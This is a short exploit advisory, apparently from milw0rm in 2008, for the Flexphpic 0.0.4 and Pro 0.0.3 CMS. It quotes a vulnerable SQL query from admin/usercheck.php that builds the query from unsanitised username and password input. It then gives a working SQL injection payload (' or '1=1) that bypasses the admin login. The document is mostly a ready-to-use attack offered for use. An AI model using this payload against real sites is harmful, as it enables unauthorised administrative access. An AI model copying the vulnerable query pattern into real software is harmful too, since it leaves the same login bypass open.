18 lines
No EOL
573 B
Text
18 lines
No EOL
573 B
Text
#############################################
|
|
Autore: S.W.A.T.
|
|
Email: svvateam@yahoo.com
|
|
Site: Www.BaTLaGH.coM
|
|
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
|
|
Download: http://www.china-on-site.com/flexphpic/downloads.php
|
|
##############################################
|
|
Bug In \admin\usercheck.php
|
|
$sql = "select username,adminid from linkexadmin where
|
|
username='$checkuser' and password='$checkpass'";
|
|
Exploit:
|
|
|
|
Go to /[path]/admin/index.php
|
|
Put as username and password the following sql code: ' or '1=1
|
|
|
|
I'll Be A C I D A L !!!
|
|
|
|
# milw0rm.com [2008-12-30] |